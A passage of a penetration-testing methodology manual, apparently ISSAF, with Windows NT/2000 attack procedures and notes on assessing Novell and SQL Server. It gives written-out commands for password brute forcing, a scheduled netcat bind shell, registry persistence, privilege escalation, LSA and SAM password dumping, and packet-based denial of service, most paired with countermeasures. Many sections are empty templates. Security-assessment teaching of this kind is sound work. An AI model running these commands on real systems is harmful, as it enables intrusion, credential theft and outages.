Refer ISSAF Methodology Section
F.8.4.1 IDENTIFY LIVE HOSTS
Description
You can identify the live hosts on the network. Each live host can become a potential
target.
Pre-requisite[s]
Steps to be performed
Ping sweeps the whole network.
Examples/Results
Use pinger
Use Solarwinds Pingsweep utility
Nmap ping sweep.
Analysis/Conclusion/Observation
An attacker was able to enumerate the live hosts in the target network.
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Be careful while performing this activity. It can easily saturate a slow link.
Page 407 of 1123
Page 408 of 1123
Formatted: Bullets and Numbering
F.8.5 VULNERABILITY IDENTIFICATION
Refer section -- -Formatted: Bullets and Numbering
F.8.6 PENETRATION
1. Examine Common Protocols -> Port scan. Maybe this section is in another doc
2. Examine Windows WinNT/2k/2003
•
a.
Remote Attacks
Password Attacks
•
SMBGrind
F.8.6.1 BRUTEFORCE PASSWORDS – REMOTE ATTACK
Description
You can brute force known usernames with a dictionary or with brute force.
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable
To know at least one username
To know password policies (if you don’t want to lock accounts)
Steps to be performed
Examples/Results
Using enum.exe:
enum -u administrador -D -f test.txt 10.1.2.3
Analysis/Conclusion/Observation
Page 409 of 1123
An attacker was able to obtain all the domain controllers can use it to obtain more sensible
data.
Countermeasures
Restrict public access to ports 135-139 & 445.
Tool[s]
http://www.cqure.net/tools.jsp?id=19 - CifsPwScanner
http://www.bindview.com/Resources/RAZOR/Files/enum.tar.gz - Enum.exe
http://www.tamos.com/bitrix/redirect.php?event1=download&event2=nettools&event3=&got
o=/files/ent3.zip - Essential NetTools 3.2
http://www.packetstormsecurity.com/NT/EZPass.zip - EZPass
http://www.packetstormsecurity.com/NT/scanners/nat10bin.zip - NAT for Windows
http://www.packetstormsecurity.com/NT/scanners/nat10.tar.gz - NAT for Linux
Further Reading[s]
Remarks
Be careful with domain password policies or you can lock a lot of accounts.
3. Examine Common Protocols
4. Examine Windows WinNT/2k/2003
•
a.
Remote Attacks
Password Attacks
•
b.
SMBGrind
Buffer overflow Attacks -> link to another doc explaining BoFs
a. Parameter Checks in System Calls
c.
Heapoverflow Attacks -> link to another doc explaining BoFs
d.
Integeroverflow Attacks -> link to another doc explaining BoFs
e.
Formatstring Attacks -> link to another doc explaining BoFs
f.
Web Server Attack -> link to another doc explaining BoFs
g.
Mail Server Attacks -> link to another doc explaining BoFs
h.
NetBIOS Attacks
•
RedButton -> It’s only a NULL Session attack, required to gather
users… Explained before on Identify Users
i.
Server Message Block Attacks
j.
MD4 Collision Attacks
Page 410 of 1123
k.
Scheduling Attacks
l.
Registry Attack
m.
Reverse Shell Attacks
n.
Port Redirection
o.
Sechole Attack (IIS)
p.
Denial of Service Attack
•
•
WinNuke
•
Teardrop, Teardrop2 (bonk and boink)
•
Land and LaTierra
Local Attacks
a. Registry Attacks
b. Privilege escalation
•
GetAdmin
•
pipeup admin
•
LPC attack
•
everyone2user.exe
c. Password Attacks
b. Password Dumping
c. DLL Injection
d. By passing the Authentication
d. Using other Operating System
e. Using bootable Tools
e. File System Attack
f.
File Allocation Table (FAT
g. High Performance File System (HPFS
h. NT File System (NTFS)
f.
i.
Namned Pipe File System (NPFS)
j.
Mailslot File System (MSFS)
Denial of Service Attack
k. NTCrash
l.
CPUHog
m. System Initialization
n. Rollback
o. Virus Attacks
Page 411 of 1123
5. Examine Windows Desktops
a. Windows 95/98
b. Windows ME
c. Windows XP
Refer ISSAF Methodology Section.
F.8.7 GAINING ACCESS AND PRIVILEGE ESCALATION
Refer ISSAF Methodology Section.
F.8.8 ENUMERATE FURTHER
Refer ISSAF Methodology Section.
F.8.9 MAINTAINING ACCESS
Refer ISSAF Methodology Section.
F.8.10
COVERING THE TRACKS
Refer ISSAF Methodology Section.
F.8.11
AUDIT
Refer ISSAF Methodology Section.
F.8.12
REPORTING
Refer ISSAF Methodology Section.
F.8.13
CLEAN UP AND DESTROY ARTIFACTS
Refer ISSAF Methodology Section.
F.9 IDENTIFY LIVE HOSTS
Refer ISSAF Methodology Section.
Page 412 of 1123
F.10 IDENTIFY PORTS AND SERVICES
Refer ISSAF Methodology Section.
F.11 ENUMERATION ATTACK
F.11.1
Browse List
•
Identify Browser Masters
•
Identify Domains on the Network
•
Identify Domain Controllers
•
Identify Hosts of Domain
•
View Domain Membership
Page 413 of 1123
F.11.2
Identify Browser Masters
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
C:\>nbtstat -A 192.168.0.10
Local Area Connection:
Node IpAddress: [192.168.0.10] Scope Id: []
NetBIOS Remote Machine Name Table
Name
Type
Status
--------------------------------------------MITHU
<00> UNIQUE
Registered
MITHU
<20> UNIQUE
Registered
MITHU
<03> UNIQUE
Registered
WORKGROUP
<00> GROUP
Registered
WORKGROUP
<1E> GROUP
Registered
BALWANT
<03> UNIQUE
Registered
MAC Address = 00-0B-2B-0E-2B-AF
Analysis/Conclusion/Observation
Tool[s]
Countermeasures
Page 414 of 1123
Further Reading[s]
Remarks
Page 415 of 1123
F.11.3
Identify Domains on the Network
Description
This will identify the domains on the network.
Pre-requisite[s]
Steps to be performed
Run net view with domain option.
Examples/Results
C:\>net view /domain
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 416 of 1123
F.11.4
Identify Domain Controllers
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
C:\nltest /dclist:<domainname>
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 417 of 1123
F.11.5
Identify Browser Masters
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
C:\nltest /dclist:<domainname>
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 418 of 1123
F.11.6
Identify Hosts of Domain
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
C:\net view /domain:< domain_name >
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 419 of 1123
F.11.7
View Domain Membership
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
C:\> netdom query \\host_name
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
F.12 GLOBAL COUNTERMEASURES
F.13 CONTRIBUTORS
F.14 FURTHER READING[S]
Page 420 of 1123
Comment [B1]: Give relevant
reference to common protocols
mentioned below.
F.15 EXAMINE COMMON PROTOCOLS
SNMP
TFTP
FTP
SMTP
HTTP
NNTP
Telnet
Layer 2 Protocols
Refer section -- --
Page 421 of 1123
F.16 EXAMINING WINDOWS SYSTEMS
F.16.1
Remote Attacks
Description
Remote Attacks are more dangerous as attacker needs not to be present physically.
Hard to trace because of legal, physical and staging (attacking from compromised hosts)
constraints
F.16.2
Password Attacks
Refer Password Cracking Section from ISSAF.
F.16.3
Buffer overflow Attacks
F.16.4
Heap Overflow Attacks
F.16.5
Integer Overflow Attacks
F.16.6
Formatstring Attacks
F.16.7
Web Attacks
Description
Refer to IIS Security Assessment Section
F.16.8
Mail Service Attacks
Page 422 of 1123
F.16.9
NetBIOS Attacks
Description
Netbios service is widely used in windows for file sharing. Attacks on this service results in
enumeration of shares, usernames and sometimes Admin level access on the system.
Most important port for this service is port 139, but services running on port 135-139 & port
445 are netbios services. If netbios over tcp/ip is enabled these attacks can be carried out
over internet as well.
Pre-requisite[s]
Steps to be performed
1. Establish null session with target.
2. Enumerate shares, users, network table entries etc.
3. Enumerate remote registry using DumpSec.
4. Perform RPC-dcom and Red-Button attack on remote system.
Examples/Results
<Screen shots>
Analysis/Conclusion/Observation
Using RPC-dcom one can get a command prompt with SYSTEM privileges, remotely.
Red-Button will map and access the remote machine without using any credentials.
Countermeasures
Apply Microsoft’s Hotfix for the RPC-dcom vulnerability. Restrict anonymous login by
changing the registry value.
Tool[s]
Further Reading[s]
Remarks
Page 423 of 1123
Page 424 of 1123
F.16.10
SMB Attack
Description
SMB is Server Message Block file sharing protocol. When a windows system try to access
certain share on a remote machine it is presented with a challenge from the remote
machine. The challenge is hashed and the reply sent back by the initiator’s systems is also
hashed. If someone successful captures these hashes, passwords can be retrieved from
them. There are many ways of performing these attacks on the target machine.
Pre-requisite[s]
Steps to be performed
1. Run l0pht crack with SMB capture feature
2. Collect the hashes being passed over the network for authentication
3. Import these hashes in the main program and run the cracker.
Examples/Results
<Screen shots>
Analysis/Conclusion/Observation
An attacker was able to capture hashes being passed over the shared media without
having to try anything other than running SMB capture option.
Countermeasures
Use switched media instead of Shared media.
Tool[s]
A tool that needs mention here is l0phtCrack by @stake. http://www.atstake.com/
Further Reading[s]
Remarks
Page 425 of 1123
F.16.11
MD4 Collision Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
<Screen shots>
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 426 of 1123
F.16.12
Scheduling Attacks
Description
An attacker can schedule the Trojan to send a shell back to him at certain time and he can
do it everyday. He just needs to have the Trojan in the target machine. Microsoft’s at utility
can do this efficiently. This can be done remotely as well.
Pre-requisite[s]
Steps to be performed
1. Copy the Trojan file into the target system
2. Schedule the periodical execution of Trojan on the remote target.
Examples/Results
<Screen shots>
Analysis/Conclusion/Observation
C:\> at \\172.16.0.6 03:00A /every:1 “”nc –d –L –p 80 –e cmd.exe””
Countermeasures
Disable the scheduling service. If you need to run the scheduling service keep checking the
scheduling service queue for suspicious jobs and kill those jobs with NTRK kill utility, if
found any.
Tool[s]
Further Reading[s]
Remarks
Page 427 of 1123
F.16.13
Registry Attacks
Description
An attacker can hide his backdoors in the system after compromise and can make entries
in the registry to launch his malicious code. Things like netcat or key loggers can be
activated
on
the
system
startup
using
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run or similar entries.
Pre-requisite[s]
1. Copy the backdoor in the system
2. Run regedit
3. Change HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Steps to be performed
Examples/Results
<Screen shots>
Analysis/Conclusion/Observation
By using registry to execute files at system startup, attacker was successful in maintaining
the access to the system.
Countermeasures
Keep checking the registry for the suspicious entries.
Tool[s]
Further Reading[s]
Remarks
Page 428 of 1123
F.16.14
Port Redirection Attack
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasures
Further Reading[s]
Remarks
Page 429 of 1123
F.16.15
Sechole Attack
Refer To IIS Security Assessment Section of ISSAF.
F.16.16
Teardrop
Description
In this attack two packets are sent, one normal packet with MF flag set and another that
has a fragmentation offset that is inside the first packet but total size that makes this packet
smaller than the first and MF bit is not set. When the system tried to align these two
packets it will end up with an offset that is larger than the end mark and by doing this read
too much data, effectively crashing the system.
Pre-requisite[s]
Steps to be performed
1. Run teardrop with a source and a target address against a remote target.
Examples/Results
#teardrop 172.16.0.13 172.16.0.16 -t 138 -n 10
Analysis/Conclusion/Observation
Here the target is 172.16.0.16 is the target, -t specify the port and -n switch specifies
number of consecutive attacks to be performed. The machine without Microsoft's hotfixes
froze and needed to be rebooted.
Tool[s]
Countermeasures
1. Apply Microsoft's Hotfix for teardrop attack.
Further Reading[s]
Page 430 of 1123
Remarks
Page 431 of 1123
F.16.17
Teardrop2
Description
This attack is a variation of Teardrop as it utilizes the same code. The difference is offset
size does not matter in this case. The attack works because the last fragment has an offset
that is part of the UDP header and will therefore partially overwrite the header and the
result is an incomplete UDP packet. These packets will take up memory and eventually
cause a crash. There are two tools available for this attack bonk and boink. Bonk attacks
only one port, namely port 55 while boink gives the user the option to define a range of
ports to attack.
Pre-requisite[s]
Steps to be performed
1. Run Boink and Bonk against the "unpatched" target.
Examples/Results
#boink 172.16.0.13 172.16.0.16 100 200 10
Here the arguments 100 200 defines the port interval and 10 is the number of times boink
will consecutively attack the target (172.16.0.16)
#bonk 172.16.0.13 172.16.0.16 50
Analysis/Conclusion/Observation
Here 172.16.0.16 is the target and bonk will attack it 50 times.
Tool[s]
Countermeasures
•
Apply relevant Microsoft’s hotfix for this.
Further Reading[s]
Remarks
Page 432 of 1123
Page 433 of 1123
F.16.18
Land
Description
This attack works by sending a packet to the target, with target's ip as source as well as
destination. This causes Windows 95 machines to crash and Windows NT machines to
freeze for sometime.
Pre-requisite[s]
Steps to be performed
1. Run Land against the target
Examples/Results
#land 172.16.0.16 139
Analysis/Conclusion/Observation
With the service pack level less than SP3 machine crashed and with service pack 3 the
machine freezes for around 45 seconds.
Tool[s]
Countermeasures
Apply relevant Microsoft’s hotfixes.
Further Reading[s]
Remarks
F.16.19
LaTierra
Description
Page 434 of 1123
This attack is similar to Land but gives more options like which TCP flag to set or weather
TCP or UDP should be used. The effects of Latierra are same as Land i.e. unpatched
systems will crash or freeze for sometime.
Pre-requisite[s]
Steps to be performed
1. Run LaTierra against the target.
Examples/Results
#latierra -i 172.16.0.16 -b 139
Analysis/Conclusion/Observation
With the service pack level less than SP3 machine crashed and with service pack 3 the
machine freezes for around 45 seconds.
Tool[s]
Countermeasures
Apply relevant Microsoft's hot-fixes.
Further Reading[s]
Remarks
Page 435 of 1123
F.16.20
Local Attacks
Local attacks are performed when someone has non-privileges and/or physical access
to the systems. In most cases the attacker knows the security mechanism in place and
can potentially use social engineering more effectively.
F.16.21
Registry Attacks
Refer Registry attacks from remote attack.
F.16.22
GetAdmin
Description
GetAdmin is a local exploit that provides instant administrator privileges for any chosen
user. The attack runs locally and it works on Windows NT with service pack 3. There are
versions available which can circumvent the hotfix provided by Microsoft.
Pre-requisite[s]
Steps to be performed
1. Run GetAdmin tool on the target machine's command prompt
Examples/Results
C:\> getadmin balwant
Analysis/Conclusion/Observation
After reboot user balwant will be a member of administrator group.
Tool[s]
Countermeasures
Page 436 of 1123
1. Upgrade your Windows NT System to Windows 2000
2. Apply relevant patches and service packs
Further Reading[s]
Remarks
Page 437 of 1123
F.16.23
Pipeup Admin Attack
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasures
Further Reading[s]
Remarks
Page 438 of 1123
F.16.24
LPC Attack
Description
There is a flaw in one function of LPC (local procedure call) Ports API, which leads to a
local privilege escalation attack. Razor team came up with a tool, which exploits this
Vulnerability, called hk. This adds the desired user to the administrator group. The user
name should be a valid user name on the system.
Pre-requisite[s]
Steps to be performed
1. Run hk locally on the target system
Examples/Results
c:\> hk net localgroup administrators desired-user-name /add
lsass pid & tid are 47-48
NtImpersonateClientOfPort suceeded
Launching line was: net localgroup administrators desired-user-name /add
Who do you want to be today?
Analysis/Conclusion/Observation
The attacker was able to escalate privileges on the system to administrator level.
Tool[s]
Countermeasures
•
Apply Microsoft’s post sp6 hotfix.
•
Upgrade to windows 2000.
Further Reading[s]
Remarks
Page 439 of 1123
Page 440 of 1123
F.16.25
Key Logger Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasures
Further Reading[s]
Remarks
Page 441 of 1123
F.16.26
Password Dumping
Description
Secure Session Channels are created using a special “trusted” Domain password that the
Primary Domain Controller for the Domain creates and adds to the LSA Policy Database of
each system as it is added to the Domain. The PDC for a Domain then updates this
password every seven days and replicates the change to every trusted system within the
Domain. This trusted password, known by its Registry subkey name as $MACHINE.ACC,
is stored in HKEY_LOCAL_MACHINE\ SECURITY\Policy\LSA\Secrets.
LSAdump is the utility that retrieves the LSA secret passwords from the registry and print
them on the screen.
Pre-requisite[s]
Steps to be performed
1. Compile and run the LSA dump code on the target machine.
Examples/Results
C:\> lsadump $machine.acc \\target
QaVmkA3F
C:\>
Analysis/Conclusion/Observation
Running the code dumped the passwords stored in the registry.
Tool[s]
LSADump
Countermeasures
Upgrade to Windows 2000
Install Syskey encryption
Further Reading[s]
Page 442 of 1123
Remarks
Page 443 of 1123
F.16.27
DLL injection Attack
Description
This is an application, which dumps the password hashes from NT's SAM database,
whether or not SYSKEY is enabled on the system. The output can be used as input to
l0phtcrack, or used with Samba. You need the SeDebugPrivilege for it to work. By default,
only Administrators have this right, so this program does not compromise NT security but in
case intruder runs it along with some other exploit (eg. IIS exploits) he will get passwords
hashes for all users on that system. Cracking the hashes is only a matter of time.
The new version, pwdump3 is capable of getting the hashes over the network and can do it
whether or not the syskey is installed.
Pre-requisite[s]
Steps to be performed
1. Copy pwdump2.exe and samdump.dll in a directory of target machine
2. Run pwdump2.exe and redirect output to a txt file
3. Use text file as an input for l0phtcrack to obtain passwords
Examples/Results
c:\pwdump2> pwdump2.exe >password.txt
Analysis/Conclusion/Observation
Pwdump is a good way to audit for weak system passwords on the system.
Tool[s]
pwdumpX Attacks
Countermeasure[s]
•
Store the SAM database on a secure and removable media that can be used at
booting time.
•
Install Syskey
Further Reading[s]
Page 444 of 1123
Remarks
Page 445 of 1123
F.16.28
Bypassing the Authentication: Booting from Alternate OS
Description
Attacker boots from alternate OS ( knoppix, NTFSDos etc.) and grabs the information he
wants. The most comman target is SAM file in repair directory. Attackers can take this file
and crack it at his leasure. Also this way his activities are less likely to be logged.
Pre-requisite[s]
Steps to be performed
1. Boot the system using Knoppix
2. Mount the system drive
3. Copy the SAM file on a floppy
4. Shut down the system and remove the Knoppix CD
Examples/Results
(Assuming that attacker have booted the system with knoppix)
Get the Shell Prompt
#mount -t vfat -o ro /dev/hda1 /mnt/hda1
#cp /mnt/hda1/WINNT/repair/sam .
#cp sam /dev/fd0
#umount /dev/hda1
#halt
Analysis/Conclusion/Observation
Attacker has got the SAM file and he can crack it as and when he feels comfortable with.
Tool[s]
Countermeasure[s]
Implement container encryption for critical drives but be forewarned, this may affect the
performance.
Further Reading[s]
Page 446 of 1123
Remarks
Page 447 of 1123
F.16.29
ERD Commander 2003
Description
This is a commercial application, which can do almost everything an attacker would like to
do to a system, if he has physical access to the system. ERD commander comes with
utilities like Locksmith, NTrecover, and File Explorer etc. With ERD commander 2003 you
can do any of the followings
•
Remove or replace drivers
•
Change local Administrator passwords
•
Replace system files
•
Recover deleted files
•
Check for misconfigured NTFS security
•
Access System Restore points on unbootable XP machines
•
Enable, disable, and configure services and drivers
•
Edit registry and reset permissions
•
Access unbootable machines via your network
•
View Application, Security, and System event logs
Pre-requisite[s]
Steps to be performed
1. Download ERD Commander and burn it on a cd
2. Use it to boot the target system
3. Run NTLocksmith to reset administrator password
4. Run File Explorer to pilfer for information
5. Run Registry Editor and change the registry and reset the registry permission.
Examples/Results
<sctreen shots>
Analysis/Conclusion/Observation
Page 448 of 1123
Tool[s]
Countermeasure[s]
Restrict physical access to the system
Further Reading[s]
Remarks
There are various other option available for resetting the administrator password. Like
http://home.eunet.no/%7Epnordahl/ntpasswd/ . Be extremely careful when using these
utilities you can render your system useless.
Page 449 of 1123
F.16.30
File System Attacks: FAT Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
Page 450 of 1123
F.16.31
File System Attacks: HPFS Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
Page 451 of 1123
F.16.32
File System Attacks: NTFS Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
Page 452 of 1123
F.16.33
File System Attacks: MSFS Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
Page 453 of 1123
F.16.34
Denial of Service Attacks
Description
Denials of Service Attacks are bad for business as they cause data loss, revenue loss and
credibility damage to corporate network. They are the most loathed attacks and most of the
seasoned attackers will try to avoid them as much as possible. These attacks shall be
strictly tested on a non production system.
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Link1: http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2819030,00.html
Link2:
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/security/news/raw_so
ckets.asp
Remarks
F.16.35
Denial of Service: NTCrash
Description
Page 454 of 1123
NT programs use the NTOSKRNL by invoking functions through calls to certain libraries
(DLLs). In some of these calls the parameters are not checked properly. The missing
checks are primarily range checks and legality of addresses. NTCrash is a program written
by Mark Russinovich and Bryce Cogswell that exploits certain implementation flaws in
NTOSKRNL. It is loaded from NTOSKRNL.EXE and contains the majority of the OS
components that are executed in kernel mode. By invoking these functions with illegal or
out of range or out of bounds parameters, NT will crash.
If it was executed on a server or a domain server this program could cause DoS conditions
and result in data loss.
Pre-requisite[s]
Steps to be performed
1. Run ntcrash on the system
Examples/Results
c:\> ntcrash -n
Analysis/Conclusion/Observation
The unsecured system crumbled to the attack and went for a reboot. If after installing some
Trojan attacker needs rebooting he will just need to crash NT.
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
Page 455 of 1123
F.16.36
Denial of Service: CpuHog
Description
CpuHog is a small program written by Mark Russinovich that uses the priority mechanism
of NT to hang the system. What CpuHog does is it sets priority 15 on itself and then enters
an infinite WHILE loop. This will cause NT to hang so that it is impossible to start any other
program including the Task Manager. The strange thing here is that you need no special
privileges to be able to do this. Microsoft has in NT 4.0 Service Pack 2 and later addressed
this problem by allowing aging up to priority level 15 that means that CpuHog will only slow
down the system considerably. However, a user program can still set priority without
special privileges.
Intent. The intention with this attempt is the same as with NTCrash (see above), i.e.
The availability of the system will probably drop to zero.
Pre-requisite[s]
Steps to be performed
1. Run Cpuhog on the system
Examples/Results
c:\>cpuhog
Analysis/Conclusion/Observation
The unsecured system became unserviceable after confirming the initial question and
needed a reboot. If attacker needs rebooting after installing some Trojan, he will just need
to crash NT.
Tool[s]
Countermeasure[s]
Further Reading[s]
Page 456 of 1123
Remarks
Page 457 of 1123
F.16.37
Rollback Attack
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
Page 458 of 1123
Page 459 of 1123
G NOVELL NETWARE SECURITY ASSESSMENT
Description
[Text]
Objective
•
Understanding Novell Netware Security issues and safeguard them
•
Following a structured approach for Unix system penetration/audit
•
Gaining Access and privilege escalation
•
Going beyond admin and spreading the attack further
Expected Result[s]
•
List of live hosts
•
Processes running on hosts
•
List of users/shares
•
Version of kernel used in operating systems and their patch level
•
Vendor of operating system
•
List of vulnerabilities
•
List of compromised hosts
Methodology
[Description]
6. Identify Live Hosts
7. Identify Ports and Services
8. Enumeration Attack
a. Attaching
b. Identify Bindery
c. Identify Trees
d. Identify Users
9. Examine Common Protocols
10. Examine Novell
•
Remote Attacks
Page 460 of 1123
a. Password Attacks
b. NDS Snoop
c. Detecting Lockout
d. Pilfering The information
e. Netware Perl Attack
f.
FTP Attack
g. Buffer Overflows
h. Web Server Attacks
i.
NetBasic Directory Traversal
j.
IManage/eMFrame
k. Netware Remote Manager Attack
l.
•
Spoofing Attacks (Pandora)
Local Attacks
a. rconsole Attack
b. NDS Files Attacks
c. Back Dooring Novell
Page 461 of 1123
H DATABASE SECURITY ASSESSMENT
Oracle, MS SQL Server and MySQL are the common databases. The default ports of
these services are as follows:
Service
Port
Protocol
Oracle tns
1521
TCP
Oracle tns alt
1526
TCP
Oracle tns alt
1541
TCP
Microsoft SQL
1433
TCP
Microsoft SQL SSRS
1434
UDP
Microsoft SQL hidden
2433
TCP
MySQL
3306
TCP
This section covers followings:
1. Remote Enumeration of Databases
2. Brute-forcing databases
3. Process manipulation attack
4. End-to-end audit of databases
H.1 MICROSOFT SQL SERVER SECURITY ASSESSMENT
The Microsoft SQL Server service usually runs on TCP port 1433. However, this can be
changed through the SQL Server Network Utility settings. That is not a problem, though.
The SQL Server Resolution Service (SSRS) provides information about multiple server
instances running on the same machine. The service listens on UDP port 1434. It returns
the IP address and port number of the SQL server instance running on that system, and
you can then connect to it.
Page 462 of 1123
H.1.1.1 SQL SERVER ENUMERATION
An automated tool that will do this, is SQLPing, which will take as input the range of IP
addresses to scan, and query UDP 1434 on each of the live hosts to determine the SQL
servers, if any, that are running on those hosts. The tool can be downloaded from
http://www.sqlsecurity.com/uploads/sqlping.zip.
Example 8-11 shows the sqlping utility in use against a SQL 2000 Server, revealing the
server name, database instance name, clustering information, along with version details
and network port/named pipe information.
H.1.1.1.1 USING SQLPING TO ENUMERATE A MICROSOFT SQL SERVER
D:\SQL> sqlping 192.168.0.51
SQL-Pinging 192.168.0.51
Listening....
ServerName:dbserv
InstanceName:MSSQLSERVER
IsClustered:No
Version:8.00.194
tcp:1433
np:\\dbserv\pipe\sql\query
MetaCoretex (http://www.metacoretex.com/index.php) is an entirely Java vulnerability
scanning framework which puts special emphasis on databases. Probe objects are
written in Java by means of an easy to extend AbstractProbe class. Additionally, probe
Page 463 of 1123
generators make the process of writing simple probes almost automatic. In particular,
here are some useful remote tests:
‰
MSSQL Audit Level This probe checks the MSSQL logon auditing configuration.
It will only be capable of doing so if the JDBC Connection stored in
mssql/connection has sufficient privileges
‰
MSSQL Authentication Tester This probe attempts to connect to an available
MSSQL database using the user specified connection information. Upon
successful connection, the probe will put the JDBC Connection object into the KB
under key mssql/connection
‰
MSSQL C2 Audit This probe attempts to determine if C2 Auditing is enabled. It
will only be capable of doing so if the JDBC Connection stored in
mssql/connection has sufficient privileges
‰
MSSQL Default DBs This probe attempts to determine if any of the default
databases are still present MSSQL Login Mode This probe checks the current
LoginMode configuration of MSSQL. It will only be capable of doing so if the
JDBC Connection stored in mssql/connection has sufficient privileges
‰
MSSQL Login Stats This probe attempts to determine current login statistics
such as currently logged in users and logins/outs /sec
H.1.1.2 SQL SERVER BRUTE FORCE
forcesql and sqlbf are two excellent remote SQL Server brute-force utilities you can run
from the Win32 command line; they are available at:
http://www.sqlsecurity.com/uploads/forcesql.zip
http://www.sqlsecurity.com/uploads/sqlbf.zip
The forcesql tool is written by one of my team members and the latest version can
always be found at http://www.nii.co.in/resources/tools.html
The features of forcesql v2.0 are:
1. Easy Command-Line Control
2. Dictionary Attack
3. Brute Force Attack
Page 464 of 1123
4. Much faster than v1.0
5. It allows you to choose a port other than 1433
this tool just needs the IP address or machine name of the SQL Server and the user ID
that you wish to check. If you choose to brute force, enter the characters to search for in
the 'charset.txt' file and the maximum password length at the command line (see Usage
below). Also make sure to include the dictionary file ' words.txt ' in the same place as
forceSQL.exe for the dictionary attack.
Usage :
1. For the Dictionary Attack:
forceSQL [IP] [UserID] -d
2. For the Brute Force Attack:
forceSQL [IP] [UserID] -b [length]
3. In case the port is other than 1433, you can append it to the IP seperated by a
comma. Like so:
forceSQL [IP,port] [UserID] -b [length]
Example:
For a ten-character brute-force attack on an SQL Server running at 10.0.0.1 and port
5001: forceSQL 10.0.0.1,5001 -b 10
New Features:
The tremendous increase in speed of v2.0 over v1.0 is because we are no longer using
any SQL/ODBC API. We spent some time figuring out the packet structure of the
authentication packet as it flows over the wire. We then replicated the packet and used
that to carry out the authentication, thus bypassing everything else and going directly to
the Network Layer. This greatly reduced the overhead of allocating and using the SQL
Handles, and the SQL API. It now checks at more than 40 passwords per second
depending on network connectivity. The second significant feature we have added is that
of brute forcing in addition to the existing dictionary attack.
Page 465 of 1123
The sqlbf utility is especially useful because it allows for SQL Server username and
password combinations to be guessed through both the TCP/IP (port 1433) and named
pipe (port 139 and 445) transports.
The SQL administrator account under Microsoft SQL Server is called sa. Many SQL
Server 6.0, 6.5, 7.0, and 2000 installations can be found with no password set; however,
SQL Server 2003 doesn't permit the password to remain blank
H.1.1.2.1 SQLAT
SQLAT is a suite of tools which could be useful for pentesting a MS SQL Server. The
tools are still in development but tend to be quite stable.
The tools do dictionary attacks, upload files, read registry and dump the SAM. They do
this by wrapping extended stored procedures. There is also a tool for doing a minimal
analysis of a SQL Server with output as HTML. You need to be 'sa' to run some of the
tools, but this usually isn't a problem.
The tool temporarily restores the xp_cmdshell if it is removed and the dll is still left on the
system. SQLAT is based on the freetds library and as of version 1.0.6 supports NTLM
integrated login. It does not do named pipes yet.
Requires:
‰
FreeTDS http://www.freetds.org
‰
Pwdump2 http://razor.bindview.com/tools/files/pwdump2.zip
H.1.1.3 SQL SERVER POST-AUTHENTICATION
Once you have some type of access to the, preferably super-user, or you have managed
a privilege escalation attack, you can review the SQL Server configuration for the
following issues:
Page 466 of 1123
H.1.1.4 AUTHENTICATION MODE
SQL Server has two authentication modes. One where the users are authenticated using
their Window NT credential, and the other where they are logged in using either
Windows NT or SQL Server native credentials.
Windows Authentication Mode:
Windows Authentication Mode is the default authentication mode in SQL Server 2000. In
this mode, SQL Server 2000 relies solely on Windows to authenticate users. Windows
users or groups are then granted access to SQL Server. Connections made to the server
using this mode are known as trusted connections. When Windows Authentication Mode
is used, the database administrator allows users to access the computer running SQL
Server by granting them the right to log in to SQL Server 2000. Windows security
identifiers (SIDs) are used to track Windows authenticated logins. It is strongly
recommended that this mode be used for greater security. It also has ease-of-use
advantages as it reduces the administrative burden of creating two sets of users – one
for Windows NT, and the other for SQL Server – and assigning rights separately.
Mixed Mode Authentication:
In Mixed Mode, users can be authenticated by Windows Authentication or by SQL
Server Authentication. Users who are authenticated by SQL Server have their username
and password pairs maintained within SQL Server. These pairs are stored in the
sysxlogins system table of the master database.
In SQL Server 2000, Mixed Mode relies on Windows to authenticate users when the
client and server are capable of using NTLM (standard Windows NT 4.0 or Windows
2000 logon using challenge/response) or Kerberos logon authentication protocols. If the
client is unable to use a standard Windows logon, SQL Server requires a username and
password pair, and compares this pair against those stored in its system tables.
Connections that rely on username and password pairs are called non-trusted
connections.
Mixed mode is supplied for backward compatibility and when SQL Server 2000 is
installed on the Windows 98 or Windows Me operating systems, where Trusted
connections are not supported.
Page 467 of 1123
To determine the authentication mode, you can execute the following query:
exec xp_loginconfig "login mode"
